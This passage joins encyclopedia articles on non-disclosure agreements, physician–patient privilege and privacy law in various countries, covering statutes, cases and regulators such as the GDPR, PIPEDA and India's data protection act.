may be paid compensation subject to an NDA forbidding them from disclosing the events complained about. Such conditions in an NDA may not be enforceable by law, although they may intimidate the former employee into silence.[3] A similar concept is expressed in the term "non-disparagement agreement", which prevents one party from stating anything 'derogatory' about the other party.[4] A non-disclosure agreement (NDA) may be classified as unilateral, bilateral, or multilateral: A unilateral NDA (sometimes referred to as a one-way NDA) involves two parties where only one party (i.e., the disclosing party) anticipates disclosing certain information to the other party (i.e., the receiving party) and requires that the information be protected from further disclosure for some reason (e.g., maintaining the secrecy necessary to satisfy patent laws[5]or legal protection for trade secrets, limiting disclosure of information prior to issuing a press release for a major announcement, or simply ensuring that a receiving party does not use or disclose information without compensating the disclosing party). A bilateral NDA (sometimes referred to as a mutual NDA, MNDA, or a two-way NDA) involves two parties where both parties anticipate disclosing information to one another that each intends to protect from further disclosure. This type of NDA is common for businesses considering some kind of joint venture or merger. When presented with a unilateral NDA, some parties may insist upon a bilateral NDA, even though they anticipate that only one of the parties will disclose information under the NDA. This approach is intended to incentivize the drafter to make the provisions in the NDA more "fair and balanced" by introducing the possibility that a receiving party could later become a disclosing party or vice versa, which is not an entirely uncommon occurrence. A multilateral NDA involves three or more parties where at least one of the parties anticipates disclosing information to the other parties and requires that the information be protected from further disclosure. This type of NDA eliminates the need for separate unilateral or bilateral NDAs between only two parties. E.g., a single multiparty NDA entered into by three parties who each intend to disclose information to the other two parties could be used in place of three separate bilateral NDAs between the first and second parties, second and third parties, and third and first parties. A multilateral NDA can be advantageous because the parties involved review, execute, and implement just one agreement. This advantage can be offset by more complex negotiations that may be required for the parties involved to reach a unanimous consensus on a multilateral agreement. A NDA can protect any type of information that is not generally known. They may also contain clauses that will protect the person receiving the information so that if they lawfully obtained the information through other sources they would not be obligated to keep the information secret.[6]In other words, the NDA typically only requires the receiving party to maintain information in confidence when that information has been directly supplied by the disclosing party Some common issues addressed in an NDA include:[7] Deedsof confidentiality and fidelity (also referred to as deeds of confidentiality or confidentiality deeds) are commonly used inAustralia. These documents generally serve the same purpose as and contain provisions similar to NDAs used elsewhere. NDAs are used inIndia.[8]They have been described as "an increasingly popular way of restricting the loss ofR&Dknowledge through employee turnover in Indian IT firms".[8]They are often used by companies from other countries who areoutsourcingoroffshoringwork to companies in India.[9][10]Companies outsourcing research and development ofbiopharmato India use them, and Indian companies in pharmaceuticals are "competent" in their use.[11][12]In thespace industry, NDAs "are crucial".[13]"Non-disclosure and confidentiality agreements ... are ... generally enforceable as long as they are reasonable."[14]Sometimes NDAs have beenanti-competitiveand this has led to legal challenges.[15] In theUnited Kingdom, the term "back-to-back agreement" refers to an NDA entered into with a third party who legitimately receives confidential information, putting them under similar non-disclosure obligations as the initial party granted the information.Case lawin a 2013Court of Appealdecision (Dorchester Project Management vBNP Paribas) confirmed that a confidentiality agreement will be interpreted as a contract subject to therules of contractual interpretationwhich generally apply in English courts.[16] NDAs are often used as a condition of a financial settlement in an attempt to silence whistleblowing employees from making public the misdeeds of their former employers. There is a law, thePublic Interest Disclosure Act 1998, which allows "protected disclosure" despite the existence of an NDA, although employers sometimes intimidate the former employee into silence despite this.[3][17] In some legal cases where the conditions of a confidentiality agreement have been breached, the successful party may choose betweendamagesbased on an account of the commercial profits which might have been earned if the agreement had been honoured, or damages based on the price of releasing the other party from its obligations under the agreement.[18] Commercial entities entering into confidentiality agreements need to ensure that the scope of their agreement does not go beyond what is necessary to protect commercial information. In the case ofJones v Ricoh, heard by theHigh Courtin 2010, Jones brought an action against the photocopier manufacturerRicohfor breach of their confidentiality agreement when Ricoh submitted atenderfor a contract with a third party. Ricoh sought release from its obligations under the agreement via an application forsummary judgment, and the court agreed that the relevant wording "went further than could reasonably be required" to protect commercial information. The agreement was held to be in breach ofArticle 101 of the Treaty on the Functioning of the European Union, which prohibits agreements which had the object or effect of distorting competition, and was therefore unenforceable.[19] As of 2025[update]NDAs have long been misused in the UK to prevent people, usually employees, from reporting sexual and other abuse they have suffered. Parliament has consulted regarding proposed legislation to curb such use, with a debate on the use of NDAs by employers to cover up workplace abuse and discrimination.[20][3] In Ireland, confidentiality agreements or non-disclsure agreements are affected by the Maternity Protection, Employment Equality and Preservation of Certain Records Act 2024.[21]The Act amends the Employment Equality Act 1998 by restricting the use of non-disclosure agreements (NDA).[22] The 2024 Act renders void any NDA that prohibits an employee from disclosing: NDAs are very common in the United States, with more than one-third of jobs in America containing an NDA. TheUnited States Congresspassed theSpeak Out Actin 2022, which prohibits them in regard tosexual harassmentandsexual assault, and the bill was signed into law by PresidentJoe Bidenon December 7, 2022.[23] Some states, includingCalifornia, recognise special circumstances relating to NDAs andnon-compete clauses.California's courtsand legislaturehave signalled that they generally value an employee's mobility and entrepreneurship more highly than they do protectionist doctrine.[24][25]
https://en.wikipedia.org/wiki/Non-disclosure_agreement
Physician–patient privilegeis a legal concept, related tomedical confidentiality, that protects communications between a patient and theirdoctorfrom being used against the patient in court. It is a part of therules of evidencein manycommon lawjurisdictions. Almost every jurisdiction that recognizes physician–patient privilege not to testify in court, either by statute or through case law, limits the privilege to knowledge acquired during the course of providing medical services. In some jurisdictions, conversations between a patient and physician may be privileged in both criminal and civil courts. The privilege may cover the situation where a patient confesses to a psychiatrist that they committed a particular crime. It may also cover normal inquiries regarding matters such as injuries that may result in civil action. For example, anydefendantthat the patient may be suing at the time cannot ask the doctor if the patient ever expressed the belief that their condition had improved. However, the rule generally does not apply to confidences shared with physicians when they are not serving in the role of medical providers. The reasoning behind the rule is that a level of trust must exist in thedoctor–patient relationshipso that the physician can properly treat the patient. If the patient were fearful of telling the truth to the physician because they believed the physician would report such behavior to the authorities, the treatment process could be rendered far more difficult, or the physician could make an incorrect diagnosis. For example, a below-age of consentpatient came to a doctor with asexually transmitted disease. The doctor is usually required to obtain a list of the patient's sexual contacts to inform them that they need treatment. This is an important health concern. However, the patient may be reluctant to divulge the names of their older sexual partners, for fear that they will be charged withstatutory rape. In some jurisdictions, the doctor cannot be forced to reveal the information revealed by their patient to anyone except to particular organizations, as specified by law, and they too are required to keep that information confidential. If, in the case the police become aware of such information, they are not allowed to use it in court as proof of the sexual misconduct, except as provided by express intent of the legislative body and formalized into law.[1] The law inOntario, Canada, requires that physicians report patients who, in the opinion of the physician, may be unfit to drive for medical reasons as per Section 203 of theHighway Traffic Act.[2] The law in New Hampshire places physician–patient communications on the same basis asattorney–client communications, except in cases where law enforcement officers seek blood or urine test samples and test results taken from a patient who is being investigated fordriving while intoxicated.[3] In the United States, theFederal Rules of Evidencedo not recognize doctor–patient privilege. At the state level, the extent of the privilege varies depending on the law of the applicable jurisdiction. For example, in Texas there is only a limited physician–patient privilege in criminal proceedings, and the privilege is limited in civil cases as well.[4] InNew South Wales, Australia, a privilege exists for "communication made by a person in confidence to another person .... in the course of a relationship in which the confidant was acting in a professional capacity".[5]This is often interpreted as being between a health professional and their patient. In some jurisdictions in Australia privilege may also extend tolawyers,[6]some victims,[7]journalists(shield laws),[8]andpriests.[9]It may also be invoked in apublic interest,[10]or settlement negotiations,[11]which may also beprivileged.[12]
https://en.wikipedia.org/wiki/Physician%E2%80%93patient_privilege
Privacy lawis a set of regulations that govern the collection, storage, and utilization of personal information from healthcare, governments, companies, public or private entities, or individuals. Privacy laws are examined in relation to an individual's entitlement to privacy or their reasonable expectations of privacy. TheUniversal Declaration of Human Rightsasserts that every person possesses the right to privacy. However, the understanding and application of these rights differ among nations and are not consistently uniform. Throughout history, privacy laws have evolved to address emerging challenges, with significant milestones including thePrivacy Act of 1974[1]in the U.S. and the European Union's Data Protection Directive of 1995. Today, international standards like theGDPRset global benchmarks, while sector-specific regulations likeHIPAAandCOPPAcomplement state-level laws in the U.S. In Canada,PIPEDAgoverns privacy, with recent case law shaping privacy rights. Digital platform challenges underscore the ongoing evolution and compliance complexities in privacy law. Privacy laws can be broadly classified into: The categorization of different laws involving individual rights of privacy assesses how different laws protect individuals from being having their rights of privacy violated or abused by certain groups or persons. These classifications provide a framework for understanding the legal principles and obligations that check privacy protection and enforcement efforts and for policymakers, legal practitioners, and individuals to better understand the complexity of the responsibilities involved in order to ensure the protection of privacy rights. Brief overview of the 4 classifications of each category to understand the ways in which privacy rights are protected and regulated: PrivacyLaws focus on protecting individuals’ rights to control their personal information and prevent unauthorized intrusion into their private lives. They encompass strict regulations governing data protection, confidentiality, surveillance, and the use of personal information by both government and corporate entities.[2] TrespassingLaws focus on breaches of privacy rights related to physical intrusion onto an individual's property or personal domain without consent. This involves illegal activities such as: entering an individual’s residence without consent, conducting surveillance using physical methods (e.g., deploying hidden cameras), or any unauthorized entry onto the individual’s property.[3] Negligencelaws generally address situations where individuals or entities fail to exercise appropriate caution in protecting the privacy rights of others, often holding them accountable through severe penalties like heavy fines. This aims to ensure compliance and deter future violations, involving incidents such as any mishandling of sensitive data, poor security measures leading to data breaches, or any non-compliance with privacy policies and regulations.[4] Fiduciarylaws regulate the relationships characterized by trust and confidence, where the fiduciary accepts and complies with the legal responsibility for duties of care, loyalty, good faith, confidentiality, and more when entrusted in serving the best interests of a beneficiary. In terms of privacy, fiduciary obligations may extend to professionals like lawyers, doctors, financial advisors, and others responsible for handling confidential information, as a result of a duty of confidentiality to their clients or patients.[5] TheAsia-Pacific Economic Cooperation(APEC) introduced a voluntary Privacy Framework in 2004, which all 21 member economies adopted. This framework aims to enhance general information privacy and facilitate the secure transfer of data across borders. It comprises nine Privacy Principles, serving as minimum standards for privacy protection, including measures to prevent harm, provide notice, limit data collection, ensure personal information is used appropriately, offer choice to individuals, maintain data integrity, implement security safeguards, allow access and correction of personal information, and enforce accountability. In 2011, APEC established the APEC Cross Border Privacy Rules System to balance the flow of information and data across borders, which is crucial for fostering trust and confidence in the online marketplace. This system builds upon the APEC Privacy Framework and incorporates four agreed-upon rules, which involve self-assessment, compliance review, recognition/acceptance, and dispute resolution and enforcement.[7] Article 8 of theEuropean Convention on Human Rights, established by theCouncil of Europein 1950 and applicable across the European continent except for Belarus and Kosovo, safeguards the right to privacy. It asserts that "Everyone has the right to respect for his private and family life, his home and his correspondence." Through extensive case law from the European Court of Human Rights in Strasbourg, privacy has been clearly defined and universally recognized as a fundamental right. Furthermore, the Council of Europe took steps to protect individuals' privacy rights with specific measures. In 1981, it adopted the Convention for the protection of individuals with regard to automatic processing of personal data. Additionally, in 1998, the Council addressed privacy concerns related to the internet by publishing "Draft Guidelines for the protection of individuals with regard to the collection and processing of personal data on the information highway," developed in collaboration with the European Commission. These guidelines were formally adopted in 1999.[8] The 1995Data Protection Directive(officially Directive 95/46/EC) acknowledged the authority of National data protection authorities and mandated that all Member States adhere to standardized privacy protection guidelines. These guidelines stipulated that Member States must enact stringent privacy laws consistent with the framework provided by the Directive. Moreover, the Directive specified that non-EU countries must implement privacy legislation of equivalent rigor to exchange personal data with EU countries. Additionally, companies in non-EU countries wishing to conduct business with EU-based companies must adhere to privacy standards at least as strict as those outlined in the Directive. Consequently, the Directive has influenced the development of privacy legislation beyond European borders. The proposedePrivacy Regulation, intended to replace the Privacy and Electronic Communications Directive 2002, further contributes toEUprivacy regulations. On 25 May 2018, theGeneral Data Protection Regulationsuperseded the Data Protection Directive of 1995. A significant aspect introduced by the General Data Protection Regulation is the recognition of the "right to be forgotten,"[9]which mandates that any organization collecting data on individuals must delete the relevant data upon the individual's request. The Regulation drew inspiration from the European Convention on Human Rights mentioned earlier. TheOECD(Organisation for Economic Co-operation and Development) initiated privacy guidelines in 1980, setting international standards, and in 2007, proposed cross-border cooperation for privacy law enforcement. The UN'sInternational Covenant on Civil and Political Rights, Article 17, protects privacy, echoed in the 2013 UN General Assembly resolution affirming privacy as a fundamental human right in the digital age. The Principles on Personal Data Protection and Privacy for the UN System were declared in 2018.[10] Article 17 of theInternational Covenant on Civil and Political Rightsof the United Nations in 1966 also protects privacy: "No one shall be subjected to arbitrary or unlawful interference with his privacy, family, home or correspondence, nor to unlawful attacks on his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks." On 18 December 2013, the United Nations General Assembly adopted resolution 68/167 on the right to privacy in the digital age. The resolution makes reference to the Universal Declaration of Human Rights and reaffirms the fundamental and protected human right of privacy.[11] The Principles on Personal Data Protection and Privacy for the United Nations System were declared on 11 October 2018.[12] The current state of privacy law in Australia includes Federal and state information privacy legislation, some sector-specific privacy legislation at state level, regulation of the media and some criminal sanctions. The current position concerning civil causes of action for invasion of privacy is unclear: some courts have indicated that a tort of invasion of privacy may exist in Australia.[13][14][15][16]However this has not been upheld by the higher courts, which have been content to develop the equitable doctrine of Breach of Confidence to protect privacy, following the example set by the UK.[15]In 2008, theAustralian Law Reform Commissionrecommended the enactment of a statutory cause of action for invasion of privacy.[17]ThePrivacy Act 1988aims to protect and regulate an individual's private information.[18]It manages and monitorsAustralian Governmentand organisations on how they hold personal information.[18] The Bahamas has an official data protection law that protects the personal information of its citizens in both the private and public sector: Data Protection Act 2003 (the Bahamas Law).[19]The Bahamas Law appoints a data protection commissioner to the Office of Data Protection to ensure that data protection is being held. Even though there is legislation enforced in the Bahamas through the Data Protection Act 2003, the act lacks many enforcements since a data protection officer doesn't need to be in office nor does any group or organization need to notify the Office of Data Protection when a hacker has breached privacy law. Also, there are no requirements for registering databases or restricting data flow across national borders. Therefore, the legislation does not meet European Union standards, which was the goal of creating the law in the first place.[20] The Bahamas is also a member ofCARICOM, the Caribbean Community. Belize is currently part of the minority of countries that do not have any official data privacy laws.[21]However, theFreedom of Information Act(2000) currently protects the personal information of the citizens of Belize, but there is no current documentation that distinguishes if this act includes electronic data.[19] As a consequence of the lack of official data privacy laws, there was a breach of personal data in 2009 when an employee's laptop from Belize's Vital Statistics Unit was stolen, containing birth certification information for all citizens residing in Belize. Even though the robbery was not intentionally targeting the laptop - the robber did not predict the severity of the theft - Belize was put in a vulnerable position which could have been avoided if regulations were in order. A Brazilian citizen's privacy is protected by the country's constitution, which states: The intimacy, private life, honor and image of the people are inviolable, with assured right to indenization by material or moral damage resulting from its violation[22] On 14 August 2018, Brazil enacted itsGeneral Personal Data Protection Law.[23]The bill has 65 articles and has many similarities to the GDPR. The first translation into English of the new data protection law was published byRonaldo Lemos, a Brazilian lawyer specialized in technology, on that same date.[24]There is a newer version.[25] In Canada, the federalPersonal Information Protection and Electronic Documents Act(PIPEDA) governs the collection, use, and disclosure of personal information in connection with commercial activities, as well as personal information about employees of federal works, undertakings and businesses. The PIPEDA brings Canada into compliance withEU data protection law,[26]although civil society, regulators, and academics have more recently claimed that it does not address modern challenges of privacy law sufficiently, particularly in view of AI, calling for reform.[27] PIPEDA does not apply to non-commercial organizations or provincial governments, which remain within the jurisdiction of provinces. Five Canadian provinces have enacted privacy laws that apply to their private sector. Personal information collected, used and disclosed by the federal government and crown corporations is governed by thePrivacy Act. Many provinces have enacted provincial legislation similar to the Privacy Act, such as the OntarioFreedom of Information and Protection of Privacy Actwhich applies to public bodies in that province. There remains some debate whether there exists a common law tort for breach of privacy across Canada. There have been a number of cases identifying a common law right to privacy but the requirements have not always been articulated clearly.[28] InEastmond v. Canadian Pacific Railway & Privacy Commissioner of Canada[29]Canada's Supreme Courtfound that CP could collect Eastmond's personal information without his knowledge or consent because it benefited from the exemption in paragraph 7(1)(b) ofPIPEDA, which provides that personal information can be collected without consent if "it is reasonable to expect that the collection with the knowledge or consent of the individual would compromise the availability or the accuracy of the information and the collection is reasonable for purposes related to investigating a breach of an agreement".[29] Canadian privacy laws have significant implications for various sectors, particularly finance, healthcare, and digital commerce. For instance, the financial sector is strictly regulated underPIPEDA, which requires financial institutions to obtain consent for the collection, use, or disclosure of personal information. Moreover, these institutions must also provide robust safeguards to protect this information against loss or theft. In healthcare, provinces like Alberta and British Columbia have specific laws protecting personal health information, which require healthcare providers to manage patient data with high confidentiality and security levels. This includes ensuring that patient consent is obtained before their personal health information is shared or accessed. Recent case law in Canada has further defined the scope and application of privacy laws. For instance, the case ofJones v. Tsigerecognized the tort of intrusion upon seclusion, affirming that individuals have a right to privacy against unreasonable intrusion. This landmark ruling has significant implications for how personal data is handled across all sectors, emphasizing the need for businesses to maintain strict privacy controls.[30] Canadian privacy laws also interact with international frameworks, notably theEuropean Union’s General Data Protection Regulation (GDPR). Although PIPEDA shares many similarities with GDPR, there are nuanced differences, particularly in terms of consent and data subject rights. Canadian businesses dealing with international data need to comply with both PIPEDA and GDPR, making compliance a complex but critical task[31] The digital transformation has brought specific challenges and focus areas for privacy regulation in Canada. The Canadian Anti-Spam Legislation (CASL), for example, regulates how businesses can conduct digital marketing and communications, requiring explicit consent for sending commercial electronic messages. This legislation is part of Canada's efforts to protect consumers from spam and related threats while ensuring that businesses conduct their digital marketing responsibly.[32] The rise of digital platforms has also prompted discussions about privacy rights concerning consumer data collected by large tech companies. The Privacy Commissioner of Canada has been active in investigating and regulating how these companies comply with Canadian privacy laws, ensuring they provide transparency to users about data usage and uphold the rights of Canadian citizens Canadian privacy laws are continually evolving to address new challenges posed by technological advancements and global data flows. Businesses operating in Canada must stay informed about these changes to ensure compliance and protect the personal information of their customers effectively. For detailed guidance and the latest updates on compliance with Canadian privacy laws, businesses and individuals can refer to resources provided by the Office of the Privacy Commissioner of Canada and stay informed about developments in Canadian privacy law through expert analyses and updates.[33] In 1995, the Computer Processed Personal Information Protection Act was enacted in order to protect personal information processed by computers. The general provision specified the purpose of the law, defined crucial terms, prohibited individuals from waiving certain rights.[34] TheNational Security Lawand theCybersecurity Lawpromulgated in 2015 give public security and security departments great powers to collect all kinds of information, forcing individuals to use network services to submit private information for monitoring, and forcing network operators to store user data Within China, unrestricted "technical support" from the security department must be provided. Other laws and regulations related to privacy are as follows: Article 38. The personal dignity of citizens of the People's Republic of China shall not be violated. It is forbidden to use any method to insult, slander, and falsely accuse citizens. Article 39. The residences of the People's Republic of China should be inviolable. It is prohibited to illegally search or trespass into citizens’ houses. Article 40. The freedom and confidentiality of communications of citizens of the People’s Republic of China are protected by law. Except for the needs of national security or the pursuit of criminal offenses, the public security organs or procuratorial organs shall inspect communications in accordance with the procedures prescribed by law, no organization or individual may infringe on citizens’ freedom of communication and confidentiality for any reason. Article 1032. Natural persons enjoy the right to privacy. No organization or individual may infringe the privacy rights of others by spying, harassing, divulging, disclosing, etc. The Supreme People's Court's "Interpretation on Several Issues Concerning the Determination of Liability for Compensation for Mental Damage in Civil Torts" was adopted at the 116th meeting of the Judicial Committee of the Supreme People's Court on February 26, 2001. Article 3 After the death of a natural person, if a close relative of a natural person suffers mental pain due to the following infringements, and the people’s court sues for compensation for mental damage, the people’s court shall accept the case: (2) Illegal disclosure or use of the privacy of the deceased, or infringement of the privacy of the deceased in other ways that violate social public interests or social ethics.[citation needed] Article 39. No organization or individual may disclose the personal privacy of minors. No organization or individual may conceal or destroy letters, diaries, and e-mails of minors, except for the need to investigate crimes. Public security organs or people's procuratorates shall conduct inspections in accordance with the law, or letters, diaries, and e-mails of minors who are incapacitated. Diaries and e-mails shall be opened and read by their parents or other guardians, and no organization or individual shall open or read them. An archipelago located in the Pacific, the country ofFijiwas founded on 10 October 1970.[35]In its constitution, the people inhabiting the land are granted the right toprivacy. The exact workings from the constitution is the following: "Every person has the right to personal privacy, which includes the right to — (a)confidentialityof their personal information; (b) confidentiality of their communications; and (c) respect for their private and family life".[35]But in this very same constitution, it is expressed that it is possible "to the extent that it is necessary" for a law to be passed that limits or impacts the execution of the right to privacy law. Another privacy related law can be seen in section 54 of the Telecommunications Promulgation passed in 2008, which states that "any service provider supplying telecommunications to consumers must keep information about consumers confidential".[36]Billing information and call information are no exceptions. The only exception to this rule is for the purpose of bringing to light "fraud or bad debt". Under this law, even with the consent of the customer, the disclosure of information is not permitted.[37] Other Privacy laws that have been adopted by this country are those that are meant to protect the collected information, cookies and other privacy-related matter of tourist. This is in regards to (but not limited to) information collected during bookings, the use of one technology of another that belongs to said company or through the use of aserviceof the company, or when makingpayments. Additionally, as a member of the United Nations, the Fiji is bound by the Universal Declaration of Human Rights which states in article twelve, "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] France adopted a data privacy law in 1978. It applies to public and private organizations and forbids gathering sensitive data about physical persons (including sexuality, ethnicity, and political or religious opinions). The law is administered by theCommission nationale de l'informatique et des libertés(CNIL), a dedicated national administration.[39]Like in Germany, data violations are considered criminal offenses (Art. 84 GPR with Code Pénal, Section 1, Chapitre VI, Art. 226ff.).[40] Germany is known to be one of the first countries (in 1970) with the strictest and most detailed data privacy laws in the world. The citizens' right to protection is stated in theConstitution of Germany, in Art. 2 para. 1, and Art. 1 para. 1.[41]The citizens' data of Germany is mainly protected under theFederal Data Protection Act(1977) from corporations, which has been amended the most recently in 2009. This act specifically targets all businesses that collect information for its use. The major regulation protects the data within the private and personal sector, and as a member of the European Union (EU), Germany has additionally ratified its act, convention, and additional protocol with the EU according to the EU Data Protection Directive 95/46 EC. In Germany, there are two kinds of restrictions on a transfer of personal data. Since Germany is part of the EU Member States, the transfer of personal data of its citizens to a nation outside the EEA is always subject to a decent level of data protection in the offshore country. Secondly, according to German data policy rules, any transfer of personal data outside the EEA symbolizes a connection to a third party which requires a reason. That reason may be for emergency reasons, and a provision must be met with consent by the receiver and the subject of the data. Keep in mind that in Germany, data transfers within a group of companies is subject to the same treatment as transfer to third-parties if the location is outside the EEA. Specifically, the Federal Data Protection Commission is in charge of regulating the entirety of the enforcement of data privacy regulations for Germany. In addition, Germany is part of theOrganisation for Economic Cooperation and Development(OECD).[19]The Federal Data Protection Commission of Germany is a member of the International Conference of Data Protection and Privacy Commissioners, European Data Protection Authorities, the EU Article 29 Working Party, and the Global Privacy Enforcement Network.[19] Regarding the protection of children, Germany is potentially the first nation that has played an active role in banning the share of data within toys connected to Wi-Fi and the Internet, like for instance, "My Friend Cayla". The group in charge of protecting the data of children is theFederal Network Agency(Bundesnetzagentur).[42] Like in France, data violations are considered offenses (Art. 84 GPR with § 42 BDSG).[43] During the military dictatorship era the 57 AK law prohibited taking photos of people without their permission but the law has since been superseded. The 2472/1997 law protects personal data of citizens but consent for taking photos of people is not required as long as they aren't used commercially or are used only for personal archiving ("οικιακή χρήση" / "home use"), for publication in editorial, educational, cultural, scientific or news publications, and for fine art purposes (e.g.street photographywhich has been uphold as legal by the courts whether done by professional or amateur photographers). However, photographing people or collecting their personal data for commercial (advertising) purposes requires their consent. The law gives photographers the right to commercially use photos of people who have not consented to the use of the images in which they appear if the depicted people have either been paid for the photo session as models (so there is no separation between editorial and commercial models in Greek law) or they have paid the photographer for obtaining the photo (this, for example, gives the right to wedding photographers to advertise their work using their photos of newly-wed couples they photographed in a professional capacity). In Greece the right to take photographs and publish them or sell licensing rights over them as fine art or editorial content is protected by theConstitution of Greece(Article 14[44]and other articles) and free speech laws as well as bycase lawand legal cases. Photographing the police or children and publishing the photographs in a non-commercial capacity is also legal. In Hong Kong, the law governing the protection of personal data is principally found in the Personal Data (Privacy) Ordinance (Cap. 486) which came into force on 20 December 1996.[45]Various amendments were made to enhance the protection of personal data privacy of individuals through the Personal Data (Privacy) (Amendment) Ordinance 2012.[46]Examples of personal data protected include names, phone numbers, addresses, identity card numbers, photos, medical records and employment records. As Hong Kong remains a common law jurisdiction, judicial cases are also a source of privacy law.[47]The power of enforcement is vested with the Privacy Commissioner (the "Commissioner") for Personal Data. Non-compliance with data protection principles set out in the ordinances does not constitute a criminal offense directly. The Commissioner may serve an enforcement notice to direct the data user to remedy the contravention and/or instigate the prosecution action. Contravention of an enforcement notice may result in a fine and imprisonment.[48] India's data protection law is known as TheDigital Personal Data Protection Act, 2023, the Right to Privacy is afundamental rightand an intrinsic part of Article 21 that protects life and liberty of the citizens and as a part of the freedoms guaranteed by Part III of theConstitution. In June 2011, India passedsubordinate legislationthat included various new rules that apply to companies and consumers. A key aspect of the new rules required that any organization that processes personal information must obtain written consent from the data subjects before undertaking certain activities. However, application and enforcement of the rules is still uncertain.[49]The Aadhaar Card privacy issue became controversial when the case reached the Supreme Court.[50]The hearing in theAadhaarcase went on for 38 days across 4 months, making it the second longest Supreme Court hearing after the landmarkKesavananda Bharati v. State of Kerala.[51] On 24 August 2017, a nine-judge bench of the Supreme Court inJustice K. S. Puttaswamy (Retd.) and Anr. vs Union Of India And Ors.unanimously held that the right to privacy is an intrinsic part of right to life and personal liberty under Article 21 of the Constitution.[52] Previously, theInformation Technology (Amendment) Act, 2008made changes to theInformation Technology Act, 2000and added the following two sections relating to Privacy: Ireland is under the Data Protection Act 1988 along with the EUGeneral Data Protection Regulation, which regulates the utilization of personal data. The DPA protects data within the private and personal sector. The DPA ensures that when data is transported, the location must be safe and in acknowledgement of the legislation to maintaindata privacy. When collecting and processing data, some of the requirements are listed below: Specifically theData Protection Commissioneroversees the entirety of the enforcement of data privacy regulations for Ireland. All persons that collect and process data must register with the Data Protection Commissioner unless they are exempt (non-profit organizations, journalistic, academic, literary expression etc.)[56]and renew their registration annually.[citation needed][57] Considering the protection of internet property and online data, the ePrivacy Regulations 2011 protect the communications and higher-advanced technical property and data such as social media and the telephone. In relation to international data privacy law that Ireland is involved in, the British–Irish Agreement Act 1999 Section 51 extensively states the relationship between data security between the United Kingdom and Ireland.[58] In addition, Ireland is part of theCouncil of Europeand theOrganisation for Economic Cooperation and Development.[19] The Data Protection Commissioner of Ireland is a member of the International Conference of Data Protection and Privacy Commissioners, European Data Protection Authorities, the EU Article 29 Working Party, Global Privacy Enforcement Network, and the British, Irish, and Islands Data Protection Authorities.[19] Ireland is also the main international location for social media platforms, specificallyLinkedInand Twitter, for data collection and control for any data processed outside the United States.[59][60] The Jamaican constitution grants its people the right to "respect for and protection of private and family life, and privacy of the home".[61]Although the government grants its citizens the right to privacy, the protection of this right is not strong. But in regards to other privacy laws that have been adopted in Jamaica, the closest one is the Private Security Regulation Authority Act. This act passed in the year 1992, establishing the Private Security Regulation Authority.[62]This organization is tasked with the responsibility of regulating the private security business and ensuring that everyone working as aprivate security guardis trained and certified. The goal of this is to ensure a safer home, community, and businesses.[63]One of the reasons as to why this law was passed is that as trained workers, the guards could ensure maximumCustomer serviceand also with the education they received they would be equipped how best to deal with certain situations as well as avoid actions can that could be considered violations, such as invasion of privacy.[63]Additionally, as a member of the United Nations, the Jamaica is bound by theUniversal Declaration of Human Rightswhich states in article two "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] On 30 May 2003, Japan enacted a series of laws in the area of data protection: The two latter acts (amended in 2016) contain provisions applicable to the protection of personal information by public sector entities.[64] Kenya currently does not have a strong general privacy protection law for its constituents. But in chapter 4 — The Bill of Rights, and in the second part which is titled "Rights and Fundamental Freedoms", of theconstitution, privacy is allocated its own section. There we see that theKenyan governmentexpress that all its people have the right to privacy, "which includes the right not to have — (a) their person, home or property searched; (b) their possessions seized; (c) information relating to their family or private affairs unnecessarily required or revealed, or (d) the privacy of their communications infringed".[65]Although Kenya grants its people the right to privacy, there seems to be no existing document that protects these specific privacy laws. Regarding privacy laws relating to data privacy, like many African countries as expressed by Alex Boniface Makulilo, Kenya's privacy laws are far from the European 'adequacy' standard.[66] As of today, Kenya does have laws that focus on specific sectors. The following are the sectors: communication and information. The law pertaining to this is called the Kenya Information and Communication Act.[67]This Act makes it illegal for any licensed telecommunication operators to disclose or intercept information that is able to get access through the customer's use of the service. This law also grants privacy protection in the course of making use of the service provided by said company.[67]And if the information of the customer is going to be provided to any third party it is mandatory that the customer is made aware of such an exchange and that some form of agreement is reached, even if the person is a family member. This act also goes as far as protecting data for Kenyans especially for the use of fraud and other ill manners. Additionally, as a member of the United Nations, Kenya is bound bythe universal declaration of Human Rightswhich states in article two "No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honor and reputation. Everyone has the right to the protection of the law against such interference or attacks".[38] After their independence from Great Britain in 1957, Malaysia's existing legal system was based primarily on English common law.[68]The following common lawtortsare related to personal information privacy and continue to play a role in Malaysia's legal system:breach of confidence,defamation,malicious falsehood, andnegligence.[68]In recent years, however, theCourt of Appealin Malaysia has referred less to English common law and instead looked more toward other nations with similar colonial histories and whose written constitutions are more like theMalaysian Constitution.[68]Unlike the courts in these other nations, such asIndia's Supreme Court, the Malaysian Court of Appeal has not yet recognized a constitutionally protected right to privacy.[68] In June 2010, theMalaysian Parliamentpassed the Personal Data Protection Act 2010, and it came into effect in 2013.[69]It outlines seven Personal Data Protection Principles that entities operating in Malaysia must adhere to: the General Principle, the Notice and Choice Principle, the Disclosure Principle, the Security Principle, the Retention Principle, the Data Integrity Principle, and the Access Principle.[69]The Act defines personal data as "'information in respect of commercial transactions that relates directly or indirectly to the data subject, who is identified or identifiable from that information or from that and other information."[69] A notable contribution to general privacy law is the Act's distinction between personal data and sensitive personal data, which entails different protections.[70]Personal data includes "information in respect of commercial transactions ... that relates directly or indirectly to a data subject" while sensitive personal data includes any "personal data consisting of information as to the physical or mental health or condition of a data subject, his political opinions, his religious beliefs or other beliefs of a similar nature."[71]Although the Act does not apply to information processed outside the country, it does restrict cross-border transfers of data from Malaysia outwards.[citation needed]Additionally, the Act offers individuals the "right to access and correct the personal data held by data users", "the right to withdraw consent to the processing of personal data", and "the right to prevent data users from processing personal data for the purpose of direct marketing."[69]Punishment for violating the Personal Data Protection Act can include fines or even imprisonment.[citation needed] Othercommon lawand business sector-specific laws that exist in Malaysia to indirectly protect confidential information include: On 5 July 2010, Mexico enacted a new privacy package, the Federal Law on Protection of Personal Data Held by Individuals, focused on treatment of personal data by private entities.[72]The key elements included were: In New Zealand, thePrivacy Act 1993(replaced byPrivacy Act 2020) sets out principles in relation to the collection, use, disclosure, security and access to personal information. The introduction into the New Zealand common law of a tort covering invasion of personal privacy at least by public disclosure of private facts was at issue inHosking v Runtingand was accepted by the Court 